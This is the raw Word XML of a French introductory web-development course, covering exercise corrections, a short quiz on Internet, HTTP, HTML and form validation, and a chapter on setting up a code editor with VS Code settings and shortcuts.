      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un temps total élevé s'explique le plus souvent par des images non optimisées, un grand nombre de scripts tiers bloquants, ou une latence réseau importante. La colonne « En attente » du navigateur aide à distinguer le temps serveur du temps de téléchargement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 1.3</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&lt;!doctype html&gt;</w:t>
        <w:br/>
        <w:t>&lt;html lang="fr"&gt;</w:t>
        <w:br/>
        <w:t>&lt;head&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;meta charset="utf-8"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;title&gt;Mon premier site&lt;/title&gt;</w:t>
        <w:br/>
        <w:t>&lt;/head&gt;</w:t>
        <w:br/>
        <w:t>&lt;body&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h1&gt;Bonjour, Web&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p&gt;Cette page est servie par HTTP, dans un navigateur.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t>&lt;/body&gt;</w:t>
        <w:br/>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le serveur se lance avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>python3 -m http.server 8000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> depuis le dossier du projet. L'onglet Réseau doit montrer une requête </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GET /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec le statut 200 et le type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>text/html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Si le navigateur affiche l'ancienne version, forcez un rechargement (Ctrl+Maj+R) : il conserve parfois une copie en cache. Vérifiez aussi que vous modifiez bien le fichier servi par le serveur, et non une copie située dans un autre dossier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 1.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les chiffres dépendent du moment de l'observation ; l'important est la méthode : même navigateur, même connexion, cache vidé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un site institutionnel présente souvent une hiérarchie de titres plus régulière, une navigation stable et peu de scripts tiers. Un site d'information multiplie les modules, les publicités et les appels réseau, au détriment du poids et de la stabilité visuelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La conclusion attendue distingue les contraintes : un site d'information privilégie la fraîcheur et le rendement publicitaire ; un site institutionnel privilégie l'accessibilité, la cohérence et la durabilité. Aucun des deux n'est « meilleur » : les choix techniques découlent du modèle d'affaires et du public.</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Quelle affirmation décrit correctement la relation entre Internet et le Web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Le Web est le réseau physique ; Internet est l'ensemble des sites.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Internet est l'infrastructure réseau ; le Web est un service qui l'utilise.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Les deux termes sont synonymes depuis HTML5.</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Internet fonctionne sans protocole IP, contrairement au Web.</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Dans quel ordre se déroulent les étapes d'un chargement de page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Requête HTTP, DNS, connexion TCP, rendu</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DNS, connexion TCP, requête HTTP, rendu</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Connexion TCP, rendu, DNS, requête HTTP</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DNS, rendu, requête HTTP, connexion TCP</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Quel est le rôle du HTML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Décrire la présentation visuelle du document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Décrire la structure et le sens du contenu</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Gérer les interactions et les animations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Chiffrer les échanges avec le serveur</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Pourquoi ouvrir un fichier en file:// pose-t-il problème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Le navigateur refuse d'afficher le HTML.</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Les modules JavaScript et les requêtes réseau sont limités ou bloqués.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Les images ne peuvent pas être affichées.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 fichier est automatiquement modifié.</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Où doit être effectuée une validation de formulaire réellement fiable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Uniquement dans le navigateur, avec JavaScript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Uniquement dans le HTML, avec l'attribut required</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Côté serveur, complétée par une validation côté client pour le confort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Dans la feuille de style CSS</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Internet est le réseau mondial fondé sur IP ; le Web est un service applicatif (URL, HTTP, HTML) qui circule sur ce réseau.</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Le navigateur doit d'abord connaître l'adresse IP (DNS), puis établir la connexion, envoyer la requête et enfin analyser la réponse pour rendre.</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HTML décrit la nature du contenu (titres, paragraphes, listes, liens). La présentation relève de CSS, le comportement de JavaScript, le chiffrement de TLS.</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Le schéma file:// ne fournit pas d'origine HTTP : les modules, fetch et certaines API de stockage sont restreints pour des raisons de sécurité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tout ce qui vient du client peut être modifié. La validation serveur est la seule barrière fiable ; celle du navigateur améliore l'expérience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>2. Installer et maîtriser son environnement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Un poste de travail bien réglé fait gagner des semaines. Voici celui que vous garderez pendant tout le cours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 00 · Niveau : Débutant · Prérequis : chapitre 1</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Installer et configurer un éditeur de code adapté au développement web.</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Utiliser les outils de développement du navigateur pour inspecter et modifier une page.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Créer une arborescence de projet propre et la versionner dès le départ.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Valider un document HTML et détecter les erreurs de structure.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Adopter des raccourcis et des conventions qui accélèrent le travail quotidien.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 L'éditeur de code : un instrument, pas un accessoire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un éditeur de code n'est pas un traitement de texte. Il comprend la syntaxe, plie les blocs, signale les parenthèses non fermées, propose des chemins de fichiers et exécute des outils externes. Le choix exact importe moins que la régularité de son usage : un éditeur médiocre bien configuré vaut mieux qu'un outil prestigieux mal maîtrisé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Trois familles coexistent. Les éditeurs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>graphiques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Visual Studio Code, Sublime Text, WebStorm) offrent une prise en main immédiate et un vaste écosystème d'extensions. Les éditeurs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>modaux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Neovim, Emacs) exigent un apprentissage plus long mais restent dans le terminal et se pilotent au clavier. Les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IDE complets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> intègrent débogueur, tests et gestion de projet dans une seule application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.3 — Quatre éditeurs, quatre philosophies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180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Outil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="293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Points forts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Limites</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="172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Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Visual Studio Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2930"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Extensions, terminal intégré, débogage, gratuit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Consommation mémoire, dépendance à Electron</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Très large</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Sublime Text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="293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Rapidité, légèreté, multi-curseurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Payant, écosystème plus restreint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="172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Confirmé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>WebStorm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2930"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réfactorisation, analyse de code avancée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Licence payante, lourd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Professionnel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Neovim / Emacs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="293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Contrôle total, travail à distance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Courbe d'apprentissage abrupte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="172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Expert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ce cours utilise Visual Studio Code dans ses captures et ses raccourcis, mais les principes restent valables ailleurs. L'important est de connaître au moins dix raccourcis par cœur, de comprendre la recherche globale et d'utiliser le formatage automatique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>2.1.1 Les réglages indispensables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Après l'installation, réglez au minimum les éléments suivants. Ils évitent les erreurs invisibles : espaces et tabulations mélangés, encodage incorrect, fin de ligne différente selon le système.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Réglages minimaux d'un poste de développement web · json</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w:t>
        <w:br/>
        <w:t xml:space="preserve">  "editor.formatOnSave": true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "editor.tabSize": 2,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "editor.insertSpaces": true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "editor.detectIndentation": false,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "editor.rulers": [100],</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "files.encoding": "utf8",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "files.eol": "\n",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "files.trimTrailingWhitespace": true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "files.insertFinalNewline": true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "html.format.wrapLineLength": 100</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'indentation à deux espaces est la convention dominante en HTML, CSS et JavaScript. Peu importe le nombre, tant qu'il est </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>constant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans un projet : un fichier qui mélange espaces et tabulations produit des différences illisibles dans Git.</w:t>
      </w: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LES DIX RACCOURCIS À CONNAÎTRE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ctrl+P (Cmd+P) : ouvrir un fichier par son nom</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ctrl+Maj+F : rechercher dans tout le projet</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ctrl+D : sélectionner l'occurrence suivante du mot</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Alt+clic : ajouter un curseur multiple</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ctrl+/ : commenter la sélection</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
